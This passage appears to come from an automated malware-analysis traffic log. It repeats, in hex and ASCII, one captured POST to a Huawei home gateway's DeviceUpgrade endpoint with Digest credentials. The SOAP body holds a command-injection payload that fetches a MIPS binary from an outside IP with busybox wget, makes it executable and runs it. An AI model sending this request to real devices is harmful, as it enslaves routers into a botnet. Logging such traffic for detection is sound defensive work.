2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 